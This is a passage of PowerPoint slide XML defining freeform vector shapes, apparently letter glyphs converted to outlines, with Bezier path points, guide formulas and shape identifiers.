                <a:gd name="T46" fmla="*/ 126 w 240"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 240"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 77 w 240"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 240"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 240"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 240"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 117 w 240"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 240"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 50 w 240"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 240"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 204 w 240"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 117 w 240"/>
                <a:gd name="T69" fmla="*/ 30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0" h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="32"/>
                    <a:pt x="150" y="56"/>
                    <a:pt x="150" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="151"/>
                    <a:pt x="78" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="180" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="33"/>
                    <a:pt x="194" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="215" y="47"/>
                    <a:pt x="220" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="240" y="41"/>
                    <a:pt x="240" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="150" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="125" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="20" y="40"/>
                    <a:pt x="20" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="36" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="26" y="149"/>
                    <a:pt x="26" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="181"/>
                    <a:pt x="33" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="53" y="335"/>
                    <a:pt x="117" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="233" y="304"/>
                    <a:pt x="233" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="243"/>
                    <a:pt x="224" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="201"/>
                    <a:pt x="171" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="81" y="190"/>
                    <a:pt x="77" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="34" y="236"/>
                    <a:pt x="50" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="67" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="204" y="218"/>
                    <a:pt x="204" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="117" y="30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46" name="Rectangle 887">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D17A8AC-30FE-4E38-B84D-6AEA91A58CE2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId63"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3616326" y="2236788"/>
              <a:ext cx="90488" cy="7938"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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47" name="Freeform 888">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7B36041-A4FD-47D9-812F-25D5CE424E6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId64"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3709988" y="2119313"/>
              <a:ext cx="73025" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 62 h 279"/>
                <a:gd name="T8" fmla="*/ 99 w 212"/>
                <a:gd name="T9" fmla="*/ 62 h 279"/>
                <a:gd name="T10" fmla="*/ 99 w 212"/>
                <a:gd name="T11" fmla="*/ 21 h 279"/>
                <a:gd name="T12" fmla="*/ 82 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 21 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 62 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 62 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 99 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 99 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="99" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="62"/>
                    <a:pt x="188" y="62"/>
                    <a:pt x="180" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="11"/>
                    <a:pt x="99" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="64" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="249"/>
                    <a:pt x="99" y="223"/>
                    <a:pt x="99" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99"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48" name="Freeform 889">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D99A620F-1A0E-4EC1-9D9A-0A3E302BD32D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId65"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3806826" y="2139951"/>
              <a:ext cx="69850" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="175"/>
                    <a:pt x="204" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="155"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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49" name="Freeform 890">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD50CCE-7D1C-4513-A925-F25B62947A5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId66"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3890963" y="2109788"/>
              <a:ext cx="82550" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 133 w 243"/>
                <a:gd name="T1" fmla="*/ 177 h 304"/>
                <a:gd name="T2" fmla="*/ 194 w 243"/>
                <a:gd name="T3" fmla="*/ 120 h 304"/>
                <a:gd name="T4" fmla="*/ 212 w 243"/>
                <a:gd name="T5" fmla="*/ 120 h 304"/>
                <a:gd name="T6" fmla="*/ 232 w 243"/>
                <a:gd name="T7" fmla="*/ 105 h 304"/>
                <a:gd name="T8" fmla="*/ 212 w 243"/>
                <a:gd name="T9" fmla="*/ 90 h 304"/>
                <a:gd name="T10" fmla="*/ 135 w 243"/>
                <a:gd name="T11" fmla="*/ 90 h 304"/>
                <a:gd name="T12" fmla="*/ 115 w 243"/>
                <a:gd name="T13" fmla="*/ 105 h 304"/>
                <a:gd name="T14" fmla="*/ 135 w 243"/>
                <a:gd name="T15" fmla="*/ 120 h 304"/>
                <a:gd name="T16" fmla="*/ 153 w 243"/>
                <a:gd name="T17" fmla="*/ 120 h 304"/>
                <a:gd name="T18" fmla="*/ 73 w 243"/>
                <a:gd name="T19" fmla="*/ 196 h 304"/>
                <a:gd name="T20" fmla="*/ 73 w 243"/>
                <a:gd name="T21" fmla="*/ 20 h 304"/>
                <a:gd name="T22" fmla="*/ 53 w 243"/>
                <a:gd name="T23" fmla="*/ 0 h 304"/>
                <a:gd name="T24" fmla="*/ 20 w 243"/>
                <a:gd name="T25" fmla="*/ 0 h 304"/>
                <a:gd name="T26" fmla="*/ 0 w 243"/>
                <a:gd name="T27" fmla="*/ 15 h 304"/>
                <a:gd name="T28" fmla="*/ 20 w 243"/>
                <a:gd name="T29" fmla="*/ 30 h 304"/>
                <a:gd name="T30" fmla="*/ 45 w 243"/>
                <a:gd name="T31" fmla="*/ 30 h 304"/>
                <a:gd name="T32" fmla="*/ 45 w 243"/>
                <a:gd name="T33" fmla="*/ 274 h 304"/>
                <a:gd name="T34" fmla="*/ 20 w 243"/>
                <a:gd name="T35" fmla="*/ 274 h 304"/>
                <a:gd name="T36" fmla="*/ 0 w 243"/>
                <a:gd name="T37" fmla="*/ 289 h 304"/>
                <a:gd name="T38" fmla="*/ 20 w 243"/>
                <a:gd name="T39" fmla="*/ 304 h 304"/>
                <a:gd name="T40" fmla="*/ 97 w 243"/>
                <a:gd name="T41" fmla="*/ 304 h 304"/>
                <a:gd name="T42" fmla="*/ 117 w 243"/>
                <a:gd name="T43" fmla="*/ 289 h 304"/>
                <a:gd name="T44" fmla="*/ 97 w 243"/>
                <a:gd name="T45" fmla="*/ 274 h 304"/>
                <a:gd name="T46" fmla="*/ 73 w 243"/>
                <a:gd name="T47" fmla="*/ 274 h 304"/>
                <a:gd name="T48" fmla="*/ 73 w 243"/>
                <a:gd name="T49" fmla="*/ 234 h 304"/>
                <a:gd name="T50" fmla="*/ 113 w 243"/>
                <a:gd name="T51" fmla="*/ 197 h 304"/>
                <a:gd name="T52" fmla="*/ 172 w 243"/>
                <a:gd name="T53" fmla="*/ 274 h 304"/>
                <a:gd name="T54" fmla="*/ 144 w 243"/>
                <a:gd name="T55" fmla="*/ 289 h 304"/>
                <a:gd name="T56" fmla="*/ 164 w 243"/>
                <a:gd name="T57" fmla="*/ 304 h 304"/>
                <a:gd name="T58" fmla="*/ 223 w 243"/>
                <a:gd name="T59" fmla="*/ 304 h 304"/>
                <a:gd name="T60" fmla="*/ 243 w 243"/>
                <a:gd name="T61" fmla="*/ 289 h 304"/>
                <a:gd name="T62" fmla="*/ 223 w 243"/>
                <a:gd name="T63" fmla="*/ 274 h 304"/>
                <a:gd name="T64" fmla="*/ 207 w 243"/>
                <a:gd name="T65" fmla="*/ 274 h 304"/>
                <a:gd name="T66" fmla="*/ 133 w 243"/>
                <a:gd name="T67" fmla="*/ 17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3" h="304">
                  <a:moveTo>
                    <a:pt x="133" y="177"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="120"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="120"/>
                    <a:pt x="232" y="120"/>
                    <a:pt x="232" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="90"/>
                    <a:pt x="219" y="90"/>
                    <a:pt x="212" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="135" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="90"/>
                    <a:pt x="115" y="90"/>
                    <a:pt x="115" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="120"/>
                    <a:pt x="128" y="120"/>
                    <a:pt x="135" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="153" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="5"/>
                    <a:pt x="70" y="0"/>
                    <a:pt x="53" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="12" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="304"/>
                    <a:pt x="117" y="304"/>
                    <a:pt x="117" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="274"/>
                    <a:pt x="105" y="274"/>
                    <a:pt x="97" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="274"/>
                    <a:pt x="144" y="274"/>
                    <a:pt x="144" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="304"/>
                    <a:pt x="156" y="304"/>
                    <a:pt x="164" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="223" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="304"/>
                    <a:pt x="243" y="304"/>
                    <a:pt x="243" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="274"/>
                    <a:pt x="230" y="274"/>
                    <a:pt x="223" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="17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50" name="Freeform 891">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83ACDF6-692C-4A10-BF59-00791E2B408B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId67"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3986213" y="2139951"/>
              <a:ext cx="71438" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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51" name="Freeform 892">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD735989-4978-4D68-ABF1-40FED1E5CCE7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId68"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4068763" y="2139951"/>
              <a:ext cx="87313" cy="76200"/>
            </a:xfrm>
